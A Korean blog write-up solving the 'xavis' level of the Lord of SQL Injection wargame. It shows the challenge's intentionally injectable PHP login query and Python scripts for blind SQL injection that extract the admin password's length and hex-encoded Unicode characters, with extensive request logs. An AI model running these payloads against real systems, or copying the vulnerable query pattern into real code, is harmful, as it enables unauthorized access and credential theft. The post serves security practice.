Oh! JUN

[Lord Of SQL Injection] 19번(어렵다★★★) 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 19번(어렵다★★★)

Kwon Oh! JUN 2022. 2. 8. 03:17

query : select id from prob_xavis where id='admin' and pw=''


<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>

 

코드만 봐서는 이전 문제와 다를바도 없고 심지어 예외처리도 별거 없어서 더 쉬워보임(;;)

그래서 일단 하던대로 해봤다.

 

★ 패스워드 길이 구하기

import requests
import string

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

for i in range(1,100):
    param = "?pw='or length(pw)in(%22"+str(i)+"%22)%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)

    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%224%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%225%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%226%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%227%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%228%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%229%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2210%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2211%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(pw)in(%2212%22)%23
password :12

패스워드의 길이는 12자리인걸 알 수 있다.

★ 패스워드 구하기

import requests
import string
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

asc = string.digits+string.ascii_letters
print(asc)
result=""

for i in range(1,25):
    for j in asc:
        param = "?pw='or id='admin' and right(left(pw,"+str(i)+"),1)="+str(j)+"%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)
?pw='or id='admin' and right(left(pw,1),1)=0%23
1번째 패스워드 :0
?pw='or id='admin' and right(left(pw,2),1)=0%23
2번째 패스워드 :0
?pw='or id='admin' and right(left(pw,3),1)=0%23
3번째 패스워드 :0
?pw='or id='admin' and right(left(pw,4),1)=0%23
4번째 패스워드 :0
?pw='or id='admin' and right(left(pw,5),1)=0%23
5번째 패스워드 :0
?pw='or id='admin' and right(left(pw,6),1)=0%23
6번째 패스워드 :0
?pw='or id='admin' and right(left(pw,7),1)=0%23
7번째 패스워드 :0
?pw='or id='admin' and right(left(pw,8),1)=0%23
8번째 패스워드 :0
?pw='or id='admin' and right(left(pw,9),1)=0%23
9번째 패스워드 :0
?pw='or id='admin' and right(left(pw,10),1)=0%23
10번째 패스워드 :0
?pw='or id='admin' and right(left(pw,11),1)=0%23
11번째 패스워드 :0
?pw='or id='admin' and right(left(pw,12),1)=0%23
12번째 패스워드 :0
?pw='or id='admin' and right(left(pw,13),1)=0%23
13번째 패스워드 :0
?pw='or id='admin' and right(left(pw,14),1)=0%23
14번째 패스워드 :0
?pw='or id='admin' and right(left(pw,15),1)=0%23
15번째 패스워드 :0
?pw='or id='admin' and right(left(pw,16),1)=0%23
16번째 패스워드 :0
?pw='or id='admin' and right(left(pw,17),1)=0%23
17번째 패스워드 :0
?pw='or id='admin' and right(left(pw,18),1)=0%23
18번째 패스워드 :0
?pw='or id='admin' and right(left(pw,19),1)=0%23
19번째 패스워드 :0
?pw='or id='admin' and right(left(pw,20),1)=0%23
20번째 패스워드 :0
?pw='or id='admin' and right(left(pw,21),1)=0%23
21번째 패스워드 :0
?pw='or id='admin' and right(left(pw,22),1)=0%23
22번째 패스워드 :0
?pw='or id='admin' and right(left(pw,23),1)=0%23
23번째 패스워드 :0
?pw='or id='admin' and right(left(pw,24),1)=0%23
24번째 패스워드 :0
pw :000000000000000000000000

패스워드 값이 다 0으로 나온다(????)

★ 현재 것

검색을 해보니까 이 문제의 답은 기존 문제와 다르게 '유니코드'이다

그래서 비교를 할려면 아래와 같이 변경해야 가능하다.

 param = "?pw='or id='admin' and right(left(hex(pw),"+str(i)+"),1)="+str(hex(ord(j)))+"%23"

 

숫자, 알파벳(문자열) → 유니코드 → 16진수 str(hex(ord(j)))
유니코드 → 16진수 hex(pw)

● 기존 것

param = "?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,"+str(i)+"),1)%09in(%22"+str(j)+"%22)%23"
문자열 str(j)
문자열 pw

패스워드 길이

import requests
import string
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

asc = string.digits+string.ascii_letters
print(asc)
result=""

for i in range(1,25):
    for j in asc:
        param = "?pw='or id='admin' and right(left(hex(pw),"+str(i)+"),1)="+str(hex(ord(j)))+"%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%224%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%225%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%226%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%227%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%228%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%229%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2210%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2211%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2212%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2213%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2214%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2215%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2216%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2217%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2218%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2219%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2220%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2221%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2222%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2223%22)%23
https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or length(hex(pw))in(%2224%22)%23
password :24

 

패스워드 구하기

import requests
import string
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
cookie = dict(PHPSESSID="goh9k752dkkg54kddvje51kftj")

asc = string.digits+string.ascii_letters
print(asc)
result=""
total_hangul=""
pw=""

for i in range(1,25):
    for j in asc:
        param = "?pw='or id='admin' and right(left(hex(pw),"+str(i)+"),1)="+str(hex(ord(j)))+"%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            pw+=j

            if i%8==0:
                hangul = chr(int(result,16))
                print(hangul)
                result=""
                total_hangul += hangul
            break
        
print("pw :"+pw)
print(total_hangul)
?pw='or id='admin' and right(left(hex(pw),1),1)=0x30%23
1번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),2),1)=0x30%23
2번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),3),1)=0x30%23
3번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),4),1)=0x30%23
4번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),5),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x37%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x38%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x39%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x61%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x62%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x63%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x64%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x65%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x66%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x67%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x68%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x69%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6a%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6b%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6c%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6d%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6e%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x6f%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x70%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x71%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x72%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x73%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x74%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x75%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x76%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x77%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x78%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x79%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x7a%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x41%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x42%23
?pw='or id='admin' and right(left(hex(pw),5),1)=0x43%23
5번째 패스워드 :C
?pw='or id='admin' and right(left(hex(pw),6),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),6),1)=0x36%23
6번째 패스워드 :6
?pw='or id='admin' and right(left(hex(pw),7),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x37%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x38%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x39%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x61%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x62%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x63%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x64%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x65%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x66%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x67%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x68%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x69%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6a%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6b%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6c%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6d%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6e%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x6f%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x70%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x71%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x72%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x73%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x74%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x75%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x76%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x77%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x78%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x79%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x7a%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x41%23
?pw='or id='admin' and right(left(hex(pw),7),1)=0x42%23
7번째 패스워드 :B
?pw='or id='admin' and right(left(hex(pw),8),1)=0x30%23
8번째 패스워드 :0
우
?pw='or id='admin' and right(left(hex(pw),9),1)=0x30%23
9번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),10),1)=0x30%23
10번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),11),1)=0x30%23
11번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),12),1)=0x30%23
12번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),13),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x37%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x38%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x39%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x61%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x62%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x63%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x64%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x65%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x66%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x67%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x68%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x69%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6a%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6b%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6c%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6d%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6e%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x6f%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x70%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x71%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x72%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x73%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x74%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x75%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x76%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x77%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x78%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x79%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x7a%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x41%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x42%23
?pw='or id='admin' and right(left(hex(pw),13),1)=0x43%23
13번째 패스워드 :C
?pw='or id='admin' and right(left(hex(pw),14),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),14),1)=0x36%23
14번째 패스워드 :6
?pw='or id='admin' and right(left(hex(pw),15),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),15),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),15),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),15),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),15),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),15),1)=0x35%23
15번째 패스워드 :5
?pw='or id='admin' and right(left(hex(pw),16),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),16),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),16),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),16),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),16),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),16),1)=0x35%23
16번째 패스워드 :5
왕
?pw='or id='admin' and right(left(hex(pw),17),1)=0x30%23
17번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),18),1)=0x30%23
18번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),19),1)=0x30%23
19번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),20),1)=0x30%23
20번째 패스워드 :0
?pw='or id='admin' and right(left(hex(pw),21),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x37%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x38%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x39%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x61%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x62%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x63%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x64%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x65%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x66%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x67%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x68%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x69%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6a%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6b%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6c%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6d%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6e%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x6f%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x70%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x71%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x72%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x73%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x74%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x75%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x76%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x77%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x78%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x79%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x7a%23
?pw='or id='admin' and right(left(hex(pw),21),1)=0x41%23
21번째 패스워드 :A
?pw='or id='admin' and right(left(hex(pw),22),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x37%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x38%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x39%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x61%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x62%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x63%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x64%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x65%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x66%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x67%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x68%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x69%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6a%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6b%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6c%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6d%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6e%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x6f%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x70%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x71%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x72%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x73%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x74%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x75%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x76%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x77%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x78%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x79%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x7a%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x41%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x42%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x43%23
?pw='or id='admin' and right(left(hex(pw),22),1)=0x44%23
22번째 패스워드 :D
?pw='or id='admin' and right(left(hex(pw),23),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x33%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x34%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x35%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x36%23
?pw='or id='admin' and right(left(hex(pw),23),1)=0x37%23
23번째 패스워드 :7
?pw='or id='admin' and right(left(hex(pw),24),1)=0x30%23
?pw='or id='admin' and right(left(hex(pw),24),1)=0x31%23
?pw='or id='admin' and right(left(hex(pw),24),1)=0x32%23
?pw='or id='admin' and right(left(hex(pw),24),1)=0x33%23
24번째 패스워드 :3
굳
pw :0000C6B00000C6550000AD73
우왕굳
            if i%8==0:
                hangul = chr(int(result,16))
                print(hangul)
                result=""
                total_hangul += hangul
            break

8자리씩 끊어서 16진수를 문자로 바꿔주었다

query : select id from prob_xavis where id='admin' and pw='우왕굳'

 

Hello admin

XAVIS Clear!


<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>

 

 

 

 

 

 

 

 

 

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 20번(%0a : 줄 바꾸기)  (0) 2022.02.09
[Lord Of SQL Injection] 19번(추가해결방법)  (0) 2022.02.09
[Lord Of SQL Injection] 18번(('1')==0?) ;00%  (0) 2022.02.06
[Lord Of SQL Injection] 17번(더블쿼터, Nullbyte)  (0) 2022.02.05
[Lord Of SQL Injection] 16번 문제(싱글쿼터 우회)  (0) 2022.02.05
'문제풀이/Lord of SQL Injection' Related Articles more